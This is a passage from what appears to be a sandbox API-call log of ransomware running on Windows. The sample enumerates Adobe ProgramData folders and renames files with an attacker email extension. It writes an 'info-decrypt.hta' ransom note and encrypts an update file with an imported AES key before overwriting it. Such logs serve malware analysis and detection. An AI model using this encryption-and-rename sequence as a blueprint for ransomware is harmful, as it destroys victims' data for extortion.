lpBuffer="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0x74 [0148.554] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ede8) returned 1 [0148.554] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), fInfoLevelId=0x0, lpFileInformation=0x6e4ee64 | out: lpFileInformation=0x6e4ee64*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x3e2de60, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x3f0)) returned 1 [0148.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ede4) returned 1 [0148.554] MoveFileW (lpExistingFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata"), lpNewFileName="C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\directories.acrodata.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\programdata\\adobe\\acrobat\\10.0\\replicate\\security\\directories.acrodata.id-9c354b42.[khalate@tutanota.com].artemis")) returned 1 [0148.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f05c) returned 1 [0148.555] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM", nBufferLength=0x105, lpBuffer=0x6e4eb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM", lpFilePart=0x0) returned 0x18 [0148.555] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\", nBufferLength=0x105, lpBuffer=0x6e4eb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\", lpFilePart=0x0) returned 0x19 [0148.555] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x6e4ed84 | out: lpFindFileData=0x6e4ed84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b0b0 [0148.555] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.556] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0148.556] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 0 [0148.556] FindClose (in: hFindFile=0x77b0b0 | out: hFindFile=0x77b0b0) returned 1 [0148.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f01c) returned 1 [0148.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f028) returned 1 [0148.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f05c) returned 1 [0148.556] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM", nBufferLength=0x105, lpBuffer=0x6e4eb64, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM", lpFilePart=0x0) returned 0x18 [0148.556] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\", nBufferLength=0x105, lpBuffer=0x6e4eb38, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\", lpFilePart=0x0) returned 0x19 [0148.556] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\*", lpFindFileData=0x6e4ed84 | out: lpFindFileData=0x6e4ed84*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b0b0 [0148.556] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.557] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.0", cAlternateFileName="READER~1.0")) returned 1 [0148.557] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed94 | out: lpFindFileData=0x6e4ed94*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.557] FindClose (in: hFindFile=0x77b0b0 | out: hFindFile=0x77b0b0) returned 1 [0148.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f01c) returned 1 [0148.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4f028) returned 1 [0148.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f00c) returned 1 [0148.557] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", nBufferLength=0x105, lpBuffer=0x6e4eb14, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", lpFilePart=0x0) returned 0x26 [0148.557] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", nBufferLength=0x105, lpBuffer=0x6e4eae8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpFilePart=0x0) returned 0x27 [0148.557] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x6e4ed34 | out: lpFindFileData=0x6e4ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b0b0 [0148.559] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.559] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0148.559] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0148.559] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0148.559] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.559] FindClose (in: hFindFile=0x77b0b0 | out: hFindFile=0x77b0b0) returned 1 [0148.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efcc) returned 1 [0148.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efd8) returned 1 [0148.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4f00c) returned 1 [0148.560] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", nBufferLength=0x105, lpBuffer=0x6e4eb14, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0", lpFilePart=0x0) returned 0x26 [0148.560] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", nBufferLength=0x105, lpBuffer=0x6e4eae8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\", lpFilePart=0x0) returned 0x27 [0148.561] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x6e4ed34 | out: lpFindFileData=0x6e4ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x77b0b0 [0148.562] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xf2028d90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xf2028d90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.562] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrSecUpd10111.msp", cAlternateFileName="ADBERD~2.MSP")) returned 1 [0148.562] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4450880, ftCreationTime.dwHighDateTime=0x1cf6c45, ftLastAccessTime.dwLowDateTime=0xb4450880, ftLastAccessTime.dwHighDateTime=0x1cf6c45, ftLastWriteTime.dwLowDateTime=0xb4450880, ftLastWriteTime.dwHighDateTime=0x1cf6c45, nFileSizeHigh=0x0, nFileSizeLow=0x10e3000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10110_MUI.msp", cAlternateFileName="ADBERD~1.MSP")) returned 1 [0148.563] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 1 [0148.563] FindNextFileW (in: hFindFile=0x77b0b0, lpFindFileData=0x6e4ed44 | out: lpFindFileData=0x6e4ed44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2540cc00, ftCreationTime.dwHighDateTime=0x1d1056e, ftLastAccessTime.dwLowDateTime=0x2540cc00, ftLastAccessTime.dwHighDateTime=0x1d1056e, ftLastWriteTime.dwLowDateTime=0x2540cc00, ftLastWriteTime.dwHighDateTime=0x1d1056e, nFileSizeHigh=0x0, nFileSizeLow=0x109d000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdbeRdrUpd10116_MUI.msp", cAlternateFileName="ADBERD~3.MSP")) returned 0 [0148.563] FindClose (in: hFindFile=0x77b0b0 | out: hFindFile=0x77b0b0) returned 1 [0148.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efcc) returned 1 [0148.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4efd8) returned 1 [0148.564] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0148.564] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0148.564] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4eacc, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0148.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ef2c) returned 1 [0148.564] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6e4efa8 | out: lpFileInformation=0x6e4efa8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0148.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ef28) returned 1 [0148.566] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4eac4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0148.566] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6e4e96c, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x37 [0148.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee60) returned 1 [0148.566] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\info-decrypt.hta" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x584 [0148.566] GetFileType (hFile=0x584) returned 0x1 [0148.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee5c) returned 1 [0148.566] GetFileType (hFile=0x584) returned 0x1 [0148.567] WriteFile (in: hFile=0x584, lpBuffer=0x351e210*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6e4ef24, lpOverlapped=0x0 | out: lpBuffer=0x351e210*, lpNumberOfBytesWritten=0x6e4ef24*=0x1000, lpOverlapped=0x0) returned 1 [0148.568] WriteFile (in: hFile=0x584, lpBuffer=0x351e210*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x6e4eef8, lpOverlapped=0x0 | out: lpBuffer=0x351e210*, lpNumberOfBytesWritten=0x6e4eef8*=0x557, lpOverlapped=0x0) returned 1 [0148.568] CloseHandle (hObject=0x584) returned 1 [0148.569] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4ea48, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0148.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4eef4) returned 1 [0148.569] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), fInfoLevelId=0x0, lpFileInformation=0x351f22c | out: lpFileInformation=0x351f22c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e186d00, ftCreationTime.dwHighDateTime=0x1cfb543, ftLastAccessTime.dwLowDateTime=0x7e186d00, ftLastAccessTime.dwHighDateTime=0x1cfb543, ftLastWriteTime.dwLowDateTime=0x7e186d00, ftLastWriteTime.dwHighDateTime=0x1cfb543, nFileSizeHigh=0x0, nFileSizeLow=0x3d800)) returned 1 [0148.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4eef0) returned 1 [0148.570] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4e934, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0148.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee28) returned 1 [0148.570] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x584 [0148.570] GetFileType (hFile=0x584) returned 0x1 [0148.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee24) returned 1 [0148.571] GetFileType (hFile=0x584) returned 0x1 [0148.571] GetFileSize (in: hFile=0x584, lpFileSizeHigh=0x6e4ef30 | out: lpFileSizeHigh=0x6e4ef30*=0x0) returned 0x3d800 [0148.572] ReadFile (in: hFile=0x584, lpBuffer=0x527a530, nNumberOfBytesToRead=0x3d800, lpNumberOfBytesRead=0x6e4eedc, lpOverlapped=0x0 | out: lpBuffer=0x527a530*, lpNumberOfBytesRead=0x6e4eedc*=0x3d800, lpOverlapped=0x0) returned 1 [0148.577] CloseHandle (hObject=0x584) returned 1 [0148.577] CryptAcquireContextW (in: phProv=0x6e4ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6e4ee7c*=0x7a8f58) returned 1 [0148.579] CryptGenRandom (in: hProv=0x7a8f58, dwLen=0x10, pbBuffer=0x351fafc | out: pbBuffer=0x351fafc) returned 1 [0149.271] CryptImportKey (in: hProv=0x7a8f58, pbData=0x349f354, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6e4ee4c | out: phKey=0x6e4ee4c*=0x77b4f0) returned 1 [0149.271] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.271] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.272] CryptDuplicateKey (in: hKey=0x77b4f0, pdwReserved=0x0, dwFlags=0x0, phKey=0x6e4ee3c | out: phKey=0x6e4ee3c*=0x77ac30) returned 1 [0149.272] CryptContextAddRef (hProv=0x7a8f58, pdwReserved=0x0, dwFlags=0x0) returned 1 [0149.272] CryptSetKeyParam (hKey=0x77ac30, dwParam=0x4, pbData=0x349f434*=0x1, dwFlags=0x0) returned 1 [0149.272] CryptSetKeyParam (hKey=0x77ac30, dwParam=0x1, pbData=0x349f400, dwFlags=0x0) returned 1 [0149.274] CryptEncrypt (in: hKey=0x77ac30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8fe0d90*, pdwDataLen=0x6e4eea8*=0x3d810, dwBufLen=0x3d810 | out: pbData=0x8fe0d90*, pdwDataLen=0x6e4eea8*=0x3d810) returned 1 [0149.277] CryptEncrypt (in: hKey=0x77ac30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x349f45c*, pdwDataLen=0x6e4eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x349f45c*, pdwDataLen=0x6e4eeb0*=0x10) returned 1 [0149.287] CryptDestroyKey (hKey=0x77b4f0) returned 1 [0149.287] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0149.287] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0149.287] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", nBufferLength=0x105, lpBuffer=0x6e4e920, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp", lpFilePart=0x0) returned 0x3d [0149.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6e4ee14) returned 1 [0149.287] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e8 [0150.718] GetFileType (hFile=0x4e8) returned 0x1 [0150.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6e4ee10) returned 1 [0150.718] GetFileType (hFile=0x4e8) returned 0x1 [0150.718] WriteFile (in: hFile=0x4e8, lpBuffer=0x905e5e0*, nNumberOfBytesToWrite=0x3da20, lpNumberOfBytesWritten=0x6e4eed0, lpOverlapped=0x0 | out: lpBuffer=0x905e5e0*, lpNumberOfBytesWritten=0x6e4eed0*=0x3da20, lpOverlapped=0x0) returned 1 [0150.756] CloseHandle (hObject=0x4e8) returned 1 [0150.761] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e948 [0150.761] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e948 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0150.761] CoTaskMemFree (pv=0x6f2e948) [0150.761] GetFullPathNameW (in: 